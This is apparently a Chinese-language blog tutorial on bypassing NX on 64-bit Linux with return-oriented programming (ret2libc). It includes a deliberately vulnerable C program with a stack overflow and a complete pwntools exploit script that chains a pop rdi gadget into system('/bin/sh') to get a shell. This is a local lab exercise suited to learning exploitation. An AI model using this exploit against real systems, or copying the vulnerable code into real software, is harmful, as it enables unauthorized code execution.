上回弄了個32位的NX機制及策略-Ret2libc,這次弄一個64位的
將代碼在x64平臺上編譯運行,不同于x86,x64平臺前六個整型或指針參數依次保存在
RDI, RSI, RDX, RCX, R8和R9寄存器里,如果還有更多的參數的話才會保存在棧上
也就是說按之前的想法調用system函數,參數是/bin/sh的話,我們要想辦法在棧布局時,先將/bin/sh傳給rdi寄存器,再調用sytem函數
一,ROP
ROP(Return Oriented Programming)即面向返回地址編程,其主要思想是在棧緩沖區溢出的基礎上,通過利用程序中已有的小片段(gadgets)來改變某些寄存器或者變量的值,從而改變程序的執行流程,達到預期利用目的。
1.假設現有一個存在有棧溢出漏洞的棧空間布局如下:
2.我們通過布局,改變為:
①gadget_addr指向的是程序中可以利用的小片段代碼,這里使用的是pop rdi ; ret ;
對于這種搜索,我們可以使用一個工具:ROPgadget
安裝
$ git clone -b master git@github.com:JonathanSalwan/ROPgadget.git
$ cd ROPgadget
$ cd ./dependencies/capstone-next
$ ./make.sh
$ sudo ./make.sh install
$ cd ./bindings/python
$ make
$ sudo make install
②bin_sh_addr指向的是字符串參數:'/bin/sh'
③system_addr則指向system函數
3.布局說明
①當程序運行到gadget_addr時(rsp指向gadget_addr),接下來會跳轉到小片段里執行命令,同時rsp+8(rsp指向bin_sh_addr)
②然后執行pop rdi,將bin_sh_addr彈入rdi寄存器中,同時rsp + 8(rsp指向system_addr)
③執行return指令,因為這時rsp是指向system_addr的,這時就會調用system函數,而參數是通過rdi傳遞的,也就是會將/bin/sh傳入,從而實現調用system('/bin/sh')
二,測試
1,源碼
文件名:StackOF.c
#include <stdio.h>
#include <string.h>
void vul(char *msg)
{
char buffer[64];
memcpy(buffer,msg,128);
return;
}
int main()
{
puts("So plz give me your shellcode:");
char buffer[256];
memset(buffer,0,256);
read(0,buffer,256);
vul(buffer);
return 0;
}
2.編譯
gcc -g -ggdb -fno-stack-protector -no-pie StackOF.c -o pwnme
3.查看屬性及保護措施
64位文件,NX開啟
4.查看加載的libc文件及地址
ldd pwnme
得到
libc版本為:libc.so.6libc的加載地址libc_base = x00007ffff7dee000同時將
libc.so.6拷貝到pwnme同級目錄
cp /lib/x86_64-linux-gnu/libc.so.6 你的目錄
5.代碼
文件名:exp.py
from pwn import *
p = process('./pwnme')
p.recvuntil("shellcode:")
elf = ELF('libc.so.6')
system_in_libc = elf.symbols['system'] #system在libc文件里的偏移地址
#print hex(system_in_libc)
bin_sh_in_libc = next(elf.search('/bin/sh')) #/'bin/sh'字符串在libc里的偏移地址
#print hex(bin_sh_in_libc)
libc_base = 0x00007ffff7dee000 #libc加載的基址
gadget_addr = 0x0000000000401243 #搜索到的gadget片段的地址
system_addr = libc_base + system_in_libc #system在程序里的地址
bin_sh_addr = libc_base + bin_sh_in_libc #/bin/sh在程序里的地址
print hex(system_addr) +'----'+hex(bin_sh_addr)
#布局
buf = 'A'*72 #如何得到填充數據大小:http://www.lxweimin.com/p/278f8d1f8322
buf += p64(gadget_addr)
buf += p64(bin_sh_addr)
buf += p64(system_addr)
with open('poc','wb') as f :
f.write(buf)
p.sendline(buf) #開始溢出
p.interactive()
6.運行
python exp.py
輸入
whoami返回root,溢出成功!!!測試完成!!!
